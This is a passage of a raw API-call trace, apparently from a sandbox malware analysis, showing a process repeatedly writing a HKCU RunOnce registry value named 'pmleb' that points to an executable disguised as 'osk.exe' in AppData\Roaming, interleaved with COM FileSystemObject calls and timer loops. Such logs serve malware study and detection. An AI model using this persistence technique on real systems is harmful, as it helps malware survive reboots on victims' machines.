WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.830] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.830] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.830] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.830] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.831] RegCloseKey (hKey=0x280) returned 0x0 [0081.831] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.831] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.831] SetTimer (hWnd=0x20280, nIDEvent=0x20ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ca [0081.831] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.843] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.843] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.843] KillTimer (hWnd=0x20280, uIDEvent=0x20ca) returned 1 [0081.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.843] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.844] IUnknown:Release (This=0x787518) returned 0x1 [0081.844] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.844] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.844] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.844] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.844] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0081.844] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.844] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x50 [0081.844] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.845] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0081.845] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.845] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.845] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.845] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.845] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.846] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.846] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.846] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.846] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.846] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.846] RegCloseKey (hKey=0x280) returned 0x0 [0081.846] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.846] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.846] SetTimer (hWnd=0x20280, nIDEvent=0x20cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cb [0081.847] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.859] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.859] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.859] KillTimer (hWnd=0x20280, uIDEvent=0x20cb) returned 1 [0081.859] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.859] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.859] IUnknown:Release (This=0x787518) returned 0x1 [0081.859] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.859] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.859] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.860] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.860] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0081.860] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.860] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x51 [0081.860] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.861] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0081.861] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.861] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.861] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.861] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.861] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.861] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.861] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.861] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.862] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.862] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.862] RegCloseKey (hKey=0x280) returned 0x0 [0081.862] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.862] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.862] SetTimer (hWnd=0x20280, nIDEvent=0x20cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cc [0081.862] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.874] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.874] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.874] KillTimer (hWnd=0x20280, uIDEvent=0x20cc) returned 1 [0081.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.875] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.875] IUnknown:Release (This=0x787518) returned 0x1 [0081.875] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.875] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.875] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.875] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.876] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0081.876] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.876] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x52 [0081.876] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.877] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0081.877] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.877] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.877] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.877] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.877] SetErrorInfo 